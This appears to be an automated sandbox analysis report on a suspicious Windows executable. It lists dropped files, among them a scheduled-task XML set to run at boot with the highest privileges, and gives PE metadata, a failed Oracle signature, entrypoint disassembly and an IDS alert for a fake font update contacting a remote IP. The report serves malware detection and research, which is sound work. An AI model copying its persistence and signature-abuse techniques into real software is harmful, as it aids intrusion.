SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oa2auk3b.voa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oa5skexs.br5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk51fzxw.ugx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkl3ievb.l4w.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2rya5rs.sez.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5saczrk.ber.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucmwzuwc.mpc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1wrh0p2.yeu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vim5hq3k.5ww.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlvwcwmo.hcb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvi0qprp.npz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xie4hsrt.nyw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkfbet1v.5bg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycmekfon.d20.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yctgeolf.h04.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zafftng2.wuu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml

Download File

Process:	C:\Users\user\Desktop\sE5IdDeTp2.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1512
Entropy (8bit):	5.139302350214515
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEBwcLYt:cC3IQDL60uydbQ9IIYODOLqOdq2sbEW7
MD5:	D99791DECBB48A340B6C63C225B3EFDC
SHA1:	0C2D9A362D0C6A33C2CCA6684366A8BB1158DCC0
SHA-256:	16037148C9AF0EFFA3F91960EB4F60F9E09F14585ACB6089FDCCDF64E68BD804
SHA-512:	B7B165C352B42354F35C449B4EF9A4C215914FD5023216549204F16FF3281FB3FD0077E3B9585FFFDF25F2FA5CD78910E6298D3F1E9944C835F7CCBC9893EFB9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml

Download File

Process:	C:\Windows\System32\conhost.exe
File Type:	data
Category:	dropped
Size (bytes):	1512
Entropy (8bit):	6.147836345315121
Encrypted:	false
SSDEEP:	24:Rk7mUqmzyRhRYPs2wvDndrjqQ6SZDulLAXpnSyBQhJR1PDRqC0I6NaKko5MheEgP:KrhzybOPs2wRqPSDpntWRNqCqtko5QuP
MD5:	DD3F4970B2B5945ED3E4E85B5FEFCB9A
SHA1:	6C313B3A004E55894C33A628D1FE1BA3F1B8DC76
SHA-256:	BC7D16248A343B19516690B483CA909130D44CC3C72FE2E239C03E85664A7CC4
SHA-512:	9E6C2655D7ADB81B92D5624833AECCA71B0CF17251F6E237034B7904BA4D50E65BCD471BECEF0C9324FDF276D90EE59C9D012CDE6E54D71663248265BE128380
Malicious:	false
Preview:	jce.vuyz.czy.brj.jgwhioxn.A.[hu{..ehu.ywb.zydbrirjgwhi..m..pkhu.jcehvv.wlcz.dbrf.i.w.ilxh.wpQhuv.=e.{uywl..yg..h.^gx.j.xmkwpkhv.{`.U..yt.czy]brirgg.hio(.kwpkhuvjcehvuyw.czykbriH.7@.iV{.kwpk.uvjce.vLz..cz9.be..]f.oilxmow.T.tf\cehvuywlc.ydbrirjgwhio(Wkwp..uvjcei.uyClg.y...f.jgw..l{.kwpS..Ojne.vu.w[bZy.brirjgwh..Gn.wpkhuv]ceh.u.wlczydbri..S.hi.xm.Wph..vjYehKuywll.yd]rk2jgwhilxmk.pkhuv.cehvuywlczy.f2irjgw.j.x.kw.khuy.ceV.uywb.zy].rR..g.hilxUh.p..uvjcei.uy@lnz.db.ixjgw...xh..pkhztjcek.u.t.czadbrirUgwTilxmewpkh.y.ck..uyt.czydc.\q>g.hilxmh:...uvo..e.uyw.l.yk.rf.i*...lxmkwpQk.vjne..uz.lcu..br.\|8gwRilxn..pkhv.\cj.uDwlc..dbr].jg.hio'.kwpkhuu..ei.uzwo.z.db.i~.gBhd.{.kt.khzwjce.vuywWcu.f.irRgwhicxmfwpkhuvjck..uywlczy^brirjgw(i.w.kwph..vjYehKuywll.yk.riNjgw.ilxmkwq+.x@jce.vuy.l.ZNg.ri}.gwoiax.owpkfuu.ehvuywlc.yd.p.rjgw(i.xmkwu..u.n.ehKuywlcEydbq9rjf7..lxmkwpk.uv.l.xAz'lczLdbrirS.wh.b.mow..hv.j.k....wlczydbrUrjp.hio([kw..huvjcehvuywlcz.dbrirjgwhl.{.kt..huNi3e.{uyy.czL.be..]f.hilxmkw..hux.buh.{..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.811982830856188
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sE5IdDeTp2.exe
File size:	1'245'320 bytes
MD5:	dd36f6f79e68d5e54c75527db2da97ad
SHA1:	a373e613510ada66cea74ffc590c25edc59957ac
SHA256:	3030ba393865e41fee490205bf5873b4041275a8830d5e764693771fec2bd35e
SHA512:	e1f9e1c8d246fd381d5af12c87940df54df9f6877bff58abdea7a8d533a31a675b553d7e5bb134bb64576de53a3c72c4e8a3e624a639c13dfa918f2a4a638fd1
SSDEEP:	12288:2iQnVXYD4TNwzBcgXn0dE/xmiNrP64F78O9PpctLMbl0UVh4OsYX0bLDHOM5p:KNw1iS/EiNb64F78yPd+WDsYX0bLzOCp
TLSH:	2C45E093B06D20E9CC3BF03CA619A232E767B8A4175150CB59712A326B5BCD45FF893D
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...X..g.........."......~...V......@..........@.............................P............`........................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140001140
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6782E258 [Sat Jan 11 21:27:52 2025 UTC]
TLS Callbacks:	0x400022f0, 0x1, 0x40002370, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	25b2e2929328699a3b459a68f5fdc7fb

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	19/08/2021 01:00:00 20/08/2023 00:59:59
Subject Chain	CN="Oracle America, Inc.", OU=Software Engineering, O="Oracle America, Inc.", L=Redwood City, S=California, C=US
Version:	3
Thumbprint MD5:	2876C1BECB51837D0E3DE50903D025B6
Thumbprint SHA-1:	940D69C0A34A1B4CFD8048488BA86F4CED60481A
Thumbprint SHA-256:	EE46613A38B4F486164BCE7FB23178667715617F511B364594311A1548B08EB1
Serial:	068BE2F53452C882F18ED41A5DD4E7A3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00027ED5h]
mov dword ptr [eax], 00000001h
call 00007FDEB88F779Fh
nop
nop
nop
dec eax
add esp, 28h
ret
nop
inc ecx
push edi
inc ecx
push esi
push esi
push edi
push ebx
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov edi, dword ptr [eax+08h]
dec eax
mov esi, dword ptr [00027EC9h]
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007FDEB88F77C0h
dec eax
cmp edi, eax
je 00007FDEB88F77BBh
dec esp
mov esi, dword ptr [0002F361h]
nop word ptr [eax+eax+00000000h]
mov ecx, 000003E8h
inc ecx
call esi
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007FDEB88F7797h
dec eax
cmp edi, eax
jne 00007FDEB88F7779h
dec eax
mov edi, dword ptr [00027E90h]
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007FDEB88F779Eh
mov ecx, 0000001Fh
call 00007FDEB891F0D4h
jmp 00007FDEB88F77B9h
cmp dword ptr [edi], 00000000h
je 00007FDEB88F779Bh
mov byte ptr [0012BA59h], 00000001h
jmp 00007FDEB88F77ABh
mov dword ptr [edi], 00000001h
dec eax
mov ecx, dword ptr [00027E7Ah]
dec eax
mov edx, dword ptr [00027E7Bh]
call 00007FDEB891F0CBh
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007FDEB88F77ABh
dec eax
mov ecx, dword ptr [00027E50h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ff98	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x133000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x12f000	0x114c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x12d800	0x2888
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x134000	0x9b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x292f0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2f1e8	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x30280	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27de6	0x27e00	a99fe9d1965160ddc69106030cc4b61d	False	0.4477615595611285	data	6.386085069656227	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x29000	0x9230	0x9400	ec8b47ba5791ba2867ca49c3a5de31e5	False	0.2924936655405405	data	5.430027447616626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x33000	0xfb0e5	0xf9e00	01fbf7309ccb3c49ca64f155cddd2cc8	False	0.6647239635442721	data	6.457361653180868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x12f000	0x114c	0x1200	370eced07dff8d002397577b7f3ea16a	False	0.5180121527777778	data	5.213112045030989	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg	0x131000	0x10	0x200	fc74edd4cfadbf37e115bea8cdba7fcb	False	0.041015625	data	0.13091701814887827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x132000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x133000	0x340	0x400	01bd31ff039a2ba3032b09c68396f09a	False	0.37109375	data	2.789871934356042	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x134000	0x9b8	0xa00	74b3e8078809c63acec5e8ae3c7f631e	False	0.48203125	data	5.415805110669786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x133060	0x2e0	data	English	United States	0.46875

Imports

DLL

Import

msvcrt.dll

__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _aligned_free, _aligned_malloc, _amsg_exit, _assert, _cexit, _commode, _errno, _fmode, _initterm, _localtime64, _lock, _onexit, _time64, _unlock, _wcsicmp, _wcsnicmp, abort, calloc, exit, fflush, fprintf, fputc, fputwc, free, fwprintf, fwrite, getenv, isxdigit, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcsftime, wcslen, wcsncmp

KERNEL32.dll

AcquireSRWLockExclusive, DeleteCriticalSection, EnterCriticalSection, FlsAlloc, FlsGetValue, FlsSetValue, GetLastError, GetModuleHandleW, GetProcAddress, GetSystemTimeAsFileTime, InitOnceExecuteOnce, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlRestoreContext, RtlUnwindEx, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-12T17:49:37.345161+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	173.244.207.29	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 17:49:36.705070972 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:36.705101013 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:36.705180883 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:36.706289053 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:36.706302881 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:37.345092058 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:37.345160961 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:37.346263885 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:37.346317053 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:37.351582050 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:37.351589918 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:37.352004051 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:37.403054953 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:37.403069019 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:37.403543949 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:37.607667923 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:37.607820034 CET	443	49737	173.244.207.29	192.168.2.4
